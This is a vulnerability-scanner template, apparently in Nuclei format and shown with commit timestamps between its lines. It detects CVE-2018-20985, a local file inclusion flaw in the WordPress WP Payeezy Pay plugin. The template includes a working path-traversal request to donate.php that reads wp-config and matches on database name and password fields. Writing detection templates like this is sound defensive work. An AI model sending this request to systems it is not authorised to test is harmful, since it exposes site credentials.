2021-07-22 08:35:12 +00:00
id : CVE-2018-20985
info :
2022-05-13 20:26:43 +00:00
name : WordPress Payeezy Pay <=2.97 - Local File Inclusion
2021-07-22 08:35:12 +00:00
author : daffainfo
2022-04-22 10:38:41 +00:00
severity : critical
2022-05-13 20:26:43 +00:00
description : WordPress Plugin WP Payeezy Pay is prone to a local file inclusion vulnerability because it fails to sufficiently verify user-supplied input. Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks. WordPress Plugin WP Payeezy Pay version 2.97 is vulnerable; prior versions are also affected.
2023-09-06 12:57:14 +00:00
remediation : |
Update to the latest version of WordPress Payeezy Pay plugin.
2021-08-18 11:37:49 +00:00
reference :
2021-07-22 08:37:50 +00:00
- https://www.pluginvulnerabilities.com/2018/12/06/our-improved-proactive-monitoring-has-now-caught-a-local-file-inclusion-lfi-vulnerability-as-well/
2022-05-13 20:26:43 +00:00
- https://wordpress.org/plugins/wp-payeezy-pay/#developers
2022-09-23 17:53:08 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2018-20985
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2021-09-10 11:26:40 +00:00
cve-id : CVE-2018-20985
cwe-id : CWE-20
2023-10-14 11:27:55 +00:00
epss-score : 0.00922
2023-10-26 18:00:24 +00:00
epss-percentile : 0.81163
2023-09-06 12:57:14 +00:00
cpe : cpe:2.3:a:payeezy:wp_payeezy_pay:*:*:*:*:*:wordpress:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : payeezy
product : wp_payeezy_pay
2023-09-06 12:57:14 +00:00
framework : wordpress
2023-07-11 19:49:27 +00:00
tags : cve,cve2018,wordpress,lfi,plugin
2021-07-22 08:35:12 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-07-22 08:35:12 +00:00
- method : POST
path :
- "{{BaseURL}}/wp-content/plugins/wp-payeezy-pay/donate.php"
2021-07-22 13:31:00 +00:00
body : "x_login=../../../wp-config"
2021-07-22 08:35:12 +00:00
matchers-condition : and
matchers :
2021-07-22 12:32:43 +00:00
- type : word
2023-07-11 19:49:27 +00:00
part : body
2021-07-22 12:32:43 +00:00
words :
2021-07-22 13:31:00 +00:00
- "The base configuration for WordPress"
- "define( 'DB_NAME',"
- "define( 'DB_PASSWORD',"
condition : and
2023-07-11 19:49:27 +00:00
2021-07-22 08:35:12 +00:00
- type : status
status :
- 200
2023-10-27 08:59:57 +00:00
# digest: 490a0046304402203e1995836445d6da9646f82d60ddeece9ddd5a5b8782fcb0b0a2872b51041bba02201a2bc690cd465310908b8f1a04dd11c74a9a874702767a10df09aa645c626138:922c64590222798bb761d5b6d8e72950